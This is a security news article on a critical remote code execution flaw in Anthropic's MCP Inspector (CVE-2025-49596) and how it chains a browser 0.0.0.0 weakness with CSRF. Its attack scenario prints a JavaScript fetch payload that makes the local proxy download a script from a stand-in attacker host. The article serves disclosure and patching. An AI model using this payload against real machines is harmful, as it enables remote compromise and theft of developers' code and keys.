Critical remote code execution flaw reported in Anthropic's MCP Inspector tool

Cybersecurity researchers are reporting a critical security vulnerability in Anthropic's Model Context Protocol (MCP) Inspector project. 

The Model Context Protocol (MCP) is an open communication framework introduced by Anthropic in November 2024 that standardizes how large language model applications integrate and share data with external data sources and tools. The MCP Inspector is an official debugging and testing tool developed by Anthropic that consists of two primary components: 

• a React-based web user interface (MCP Inspector Client) that provides an interactive interface for testing and debugging MCP servers,
• a Node.js proxy server (MCP Proxy) that acts as a protocol bridge connecting the web UI to MCP servers through various transport methods including stdio, Server-Sent Events, and streamable HTTP connections.

The vulnerability, tracked as CVE-2025-49596 (CVSS score 9.4), allows attackers to achieve remote code execution on developer machines through browser-based attacks that exploit fundamental weaknesses in the tool's default security configuration. The discovery was made by Oligo Security Research, which reported the vulnerability to Anthropic through responsible disclosure protocols.

The attack methodology exploits a chain of vulnerabilities by combining a 19-year-old browser security flaw known as "0.0.0.0 Day" with a cross-site request forgery (CSRF) vulnerability in the MCP Inspector. The 0.0.0.0 Day vulnerability takes advantage of browsers' inability to securely handle the IP address 0.0.0.0, which tells the operating system to listen on all IP addresses assigned to the machine, including the local loopback interface. The MCP Inspector's default configuration lacks fundamental security measures including authentication and access controls. 

Attack scenario:

Developer Setup

• Alice, an AI developer, follows the official MCP quickstart guide
• She runs the command: run mcp dev server.py
• This automatically starts the MCP Inspector proxy listening on port 6277 (default)
• No authentication is required by default in versions before 0.14.1

The malicious site

• Alice finds an interesting blog post about "New MCP Development Techniques"
• She clicks the link and visits the malicious website
• The page appears to be a legitimate technical blog

Exploit

• Hidden in the webpage is malicious JavaScript code:

fetch("http://0.0.0.0:6277/sse?transportType=stdio&command=curl&args=-o%20/tmp/backdoor.sh%20https://attacker.com/payload.sh", {     "method": "GET",     "mode": "no-cors" })

• The JavaScript automatically sends a request to Alice's locally running MCP Inspector
• The request instructs the tool to download and execute a malicious script
• Since there's no authentication, the command runs immediately
• Alice's machine is now compromised

Impact

• The attacker now has code execution on Alice's development machine
• They can steal source code, API keys, or sensitive data
• Install persistent backdoors for future access
• Move laterally to other systems on Alice's network

The attack can be further enhanced through DNS rebinding techniques, where attackers create malicious DNS records pointing to local addresses, providing additional pathways to bypass browser security restrictions and achieve code execution. 

Affected versions:

• MCP Inspector versions below 0.14.1

Security researchers also identified internet-facing MCP Inspector instances that were immediately vulnerable to remote exploitation, demonstrating the real-world impact of the security flaw.

Versions that are not affected:

• MCP Inspector version 0.14.1 and later versions

Organizations and developers using MCP Inspector are strongly advised to immediately upgrade to version 0.14.1 or later, as no effective workarounds exist for earlier versions.